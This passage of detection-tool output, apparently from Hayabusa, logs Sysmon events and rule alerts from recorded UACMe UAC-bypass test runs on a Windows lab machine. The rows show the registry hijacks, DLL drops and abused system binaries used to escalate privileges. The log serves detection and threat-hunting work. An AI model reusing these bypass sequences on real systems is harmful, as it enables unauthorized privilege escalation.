747F3D96-5808-5D45-0000-00106CDC3E00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:48.924 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management 
| Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 34 | LID: 0x18d3fb | PID: 1268 | PGUID: 747F3D96-5808-5D45-0000-0010D1FE3E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:49.402 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C: | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-5809-5D45-0000-00100B233F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:49.402 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:49.436 +00:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-34 | DeleteValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir | Process: C:\Windows\explorer.exe | PID: 924 | PGUID: 747F3D96-5808-5D45-0000-00106CDC3E00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 09:46:49.502 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 924 | PGUID: 
747F3D96-5808-5D45-0000-00106CDC3E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx +2019-08-03 10:14:02.589 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 33 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.589 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.589 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.929 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.929 +00:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_sysmon/registry_set/registry_set_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.929 +00:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys 
Manipulation,,rules/sigma/registry_sysmon/registry_event/registry_event_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.934 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:02.934 +00:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_sysmon/registry_event/registry_event_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:07.652 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3fb | PID: 4208 | PGUID: 747F3D96-5E6F-5D45-0000-00108F969D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:07.665 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 324 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4060 | PGUID: 747F3D96-5E6F-5D45-0000-00103B989D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:08.065 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: 
C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3b3 | PID: 8180 | PGUID: 747F3D96-5E6F-5D45-0000-001014CA9D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:08.472 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\fodhelper.exe"" | LID: 0x18d3b3 | PID: 3656 | PGUID: 747F3D96-5E70-5D45-0000-0010FCDD9D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:08.472 +00:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:08.681 +00:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | DeleteKey: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:08.681 +00:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_sysmon/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:14:08.799 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4440 | PGUID: 
747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx +2019-08-03 10:51:46.511 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 32 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:46.511 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:46.511 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:46.647 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 32 | Path: C:\Users\IEUser\AppData\Local\Temp\OskSupport.dll | Process: C:\Windows\explorer.exe | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:46.647 +00:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_win_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:46.685 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k 
netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-6742-5D45-0000-00102A72B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:47.219 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 324 | PGUID: 747F3D96-6743-5D45-0000-0010DAA8B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:48.431 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 6456 | PGUID: 747F3D96-6743-5D45-0000-001068D7B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:48.675 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 5840 | PGUID: 747F3D96-6744-5D45-0000-00108BE4B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:48.696 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5124 | PGUID: 747F3D96-6744-5D45-0000-00102FE6B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_32.evtx +2019-08-03 10:51:49.371 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3b3 | PID: 5524 | PGUID: 747F3D96-6744-5D45-0000-0010040CB600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx +2019-08-03 11:23:15.364 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 30 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:15.364 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:15.364 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:15.560 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 30 | Path: C:\Users\IEUser\AppData\Local\Temp\wow64log.dll | Process: C:\Windows\explorer.exe | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:15.579 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3640 | PGUID: 747F3D96-6EA3-5D45-0000-0010FB58E100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:17.433 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3fb | PID: 3340 | PGUID: 747F3D96-6EA4-5D45-0000-0010DD92E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:17.541 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6292 | PGUID: 747F3D96-6EA5-5D45-0000-0010E19FE100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:18.619 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3b3 | PID: 6312 | PGUID: 747F3D96-6EA5-5D45-0000-0010C5C4E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:18.666 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 932 | PGUID: 747F3D96-6EA5-5D45-0000-00107AC9E100 | Hash: 
SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:18.694 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 | LID: 0x3e7 | PID: 6068 | PGUID: 747F3D96-6EA5-5D45-0000-001032CCE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:18.715 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 | Process: C:\Windows\SysWOW64\WerFault.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\syswow64\wusa.exe"" | LID: 0x18d3b3 | PID: 4348 | PGUID: 747F3D96-6EA5-5D45-0000-00107CCEE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:18.803 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4768 | PGUID: 747F3D96-6EA5-5D45-0000-0010EED0E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 11:23:18.824 +00:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 | LID: 0x3e7 | PID: 7844 | PGUID: 747F3D96-6EA5-5D45-0000-00108FD3E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx +2019-08-03 12:06:53.680 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 23 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:53.680 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:53.680 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:53.933 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 23 | Path: C:\Users\IEUser\AppData\Local\Temp\dismcore.dll | Process: C:\Windows\explorer.exe | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:53.943 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 
7560 | PGUID: 747F3D96-78DD-5D45-0000-0010B7B10301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:54.900 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3fb | PID: 3876 | PGUID: 747F3D96-78DE-5D45-0000-0010B3F60301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:54.972 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 406 000002806444C740 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2040 | PGUID: 747F3D96-78DE-5D45-0000-0010FFFE0301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:55.455 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3b3 | PID: 216 | PGUID: 747F3D96-78DF-5D45-0000-0010622F0401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:55.620 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | Process: C:\Windows\System32\Dism.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | LID: 0x18d3b3 | PID: 5756 | PGUID: 
747F3D96-78DF-5D45-0000-0010BD350401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:55.620 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:06:55.820 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | LID: 0x18d3b3 | PID: 4320 | PGUID: 747F3D96-78DF-5D45-0000-0010EF400401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx +2019-08-03 12:08:13.636 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 22 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:13.636 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:13.636 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx +2019-08-03 12:08:13.818 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 22 | 
